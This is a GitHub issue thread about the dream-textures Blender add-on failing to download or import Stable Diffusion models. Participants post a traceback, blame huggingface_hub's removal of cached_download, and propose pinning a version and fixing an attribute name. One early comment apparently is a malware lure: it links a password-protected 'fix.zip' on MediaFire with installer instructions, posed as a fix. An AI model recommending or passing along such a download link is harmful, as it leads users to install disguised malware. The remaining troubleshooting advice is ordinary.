### ISSUE TITLE
cant download or import models

### ISSUE THREAD

**Issue by azur-wolve** [carson-katri/dream-textures#820]
### Description

Blender 4.2.1
Linux Debian 12

Installed the dependencies but when click on "install stable diffusion 2-1 (recommended)" button. 
![Screenshot from 2024-08-28 06-56-50](https://github.com/user-attachments/assets/d7d93e21-280b-4b9a-852a-b0d466b25567)
it just stays a bit on 0% and then it disappears
![Screenshot from 2024-08-28 06-56-55](https://github.com/user-attachments/assets/76c25b42-0593-4c03-9348-1cdbfcc35cf7)
and shows the model on the addon preferences list.
![Screenshot from 2024-08-28 06-57-29](https://github.com/user-attachments/assets/bf06b78e-7cdc-4c67-8829-2bb530f70330)

But when try to select the model on the Dream lateral panel for generation it doesnt appear on the list.
![Screenshot from 2024-08-28 06-57-53](https://github.com/user-attachments/assets/7b70e24f-a690-4c7d-860e-00a380491717)

Also the same when search for specific models.
Also tried to import checkpoints but simply the same.

Not sure if those must be placed on specific folder or whatever.

Maybe i didnt built correctly from source?

### Steps to Reproduce

...

### Expected Behavior

...

### Addon Version

Other (Built from source)

### Blender Version

Blender 4.1+

### GPU

NVIDIA RTX 3060 12GB

**Comment by PiaoR** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by harry-zhang-yiyang** [comment]
same questions

**Comment by mrspritneybeers** [comment]
same issue on Mac OS Ventura :/

**Comment by RohsCE** [comment]
same issue on Opensuse. I checked the discord, in development channel, and the main dev seems to have a fix for it - issue being a bug in pytorch if I am understanding correctly

**Comment by gambikules** [comment]
v 1.0 work fine . After installing 1.0 download sd 2.1 and just update Addon

**Comment by f0kes** [comment]
> v 1.0 work fine . After installing 1.0 download sd 2.1 and just update Addon

1.0 of what?

Broken for me also
```bash
Traceback (most recent call last):
  File "/var/home/f0kes/.config/blender/4.2/scripts/addons/dream_textures/generator_process/future.py", line 105, in run_callbacks
    done_callback(self)
  File "/var/home/f0kes/.config/blender/4.2/scripts/addons/dream_textures/preferences.py", line 62, in on_done
    fetch_installed_models()
  File "/var/home/f0kes/.config/blender/4.2/scripts/addons/dream_textures/preferences.py", line 161, in fetch_installed_models
    on_done(future)
  File "/var/home/f0kes/.config/blender/4.2/scripts/addons/dream_textures/preferences.py", line 130, in on_done
    model_list = future.result()
                 ^^^^^^^^^^^^^^^
  File "/var/home/f0kes/.config/blender/4.2/scripts/addons/dream_textures/generator_process/future.py", line 52, in result
    raise self._exception
ImportError: cannot import name 'cached_download' from 'huggingface_hub' (/var/home/f0kes/.config/blender/4.2/scripts/addons/dream_textures/.python_dependencies/huggingface_hub/__init__.py)

```

**Comment by gambikules** [comment]
1.0 of addon

**Comment by Banyango** [comment]
There's seems to be at least two issues for me downloading the latest release.

1. ImportError: cannot import name 'cached_download' from 'huggingface_hub'

This appears to be related to huggingface_hub removing `cached_download` in the 0.26.0 release. If you're brave you can reinstall the python dependencies and lock huggingface_hub == 0.25.2. Otherwise the code will need to be updated to use the method recommended here https://github.com/huggingface/huggingface_hub/releases/tag/v0.26.0

2. There's a compilation error on this line in `diffusion_backend.py` 

`install_model.prefer_fp16_revision = context.preferences.addons[StableDiffusionPreferences.bl_idname].preferences.prefer_fp16_revision`

it should be 

`install_model.prefer_fp16_variant = context.preferences.addons[StableDiffusionPreferences.bl_idname].preferences.prefer_fp16_variant`

I was able to fix these issue locally and get download running again.
